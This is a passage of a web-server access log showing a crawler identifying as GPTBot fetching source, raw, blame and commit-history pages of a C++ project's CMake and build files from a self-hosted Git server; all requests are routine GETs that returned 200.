GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:14:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build" -[17/Feb/2026:15:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11669] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" -[17/Feb/2026:15:14:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11103] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" -[17/Feb/2026:15:14:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11102] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" -[17/Feb/2026:15:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11671] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject" -[17/Feb/2026:15:14:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:14:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 138208] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11670] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject" -[17/Feb/2026:15:14:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11670] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject" -[17/Feb/2026:15:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build" -[17/Feb/2026:15:14:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11106] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject" -[17/Feb/2026:15:14:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10193] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" -[17/Feb/2026:15:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13348] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" -[17/Feb/2026:15:14:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/Makefile" [Client 74.7.227.38] [Length 16185] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" -[17/Feb/2026:15:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13345] [Gzip 4.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" -[17/Feb/2026:15:14:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" -[17/Feb/2026:15:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" -[17/Feb/2026:15:14:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" -[17/Feb/2026:15:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:14:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11671] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" -[17/Feb/2026:15:15:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13347] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" -[17/Feb/2026:15:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19493] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" -[17/Feb/2026:15:15:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9940] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:15:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11404] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" -[17/Feb/2026:15:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:15:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11671] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" -[17/Feb/2026:15:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11110] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject" -[17/Feb/2026:15:15:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11114] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject" -[17/Feb/2026:15:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9917] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" -[17/Feb/2026:15:15:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9927] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr 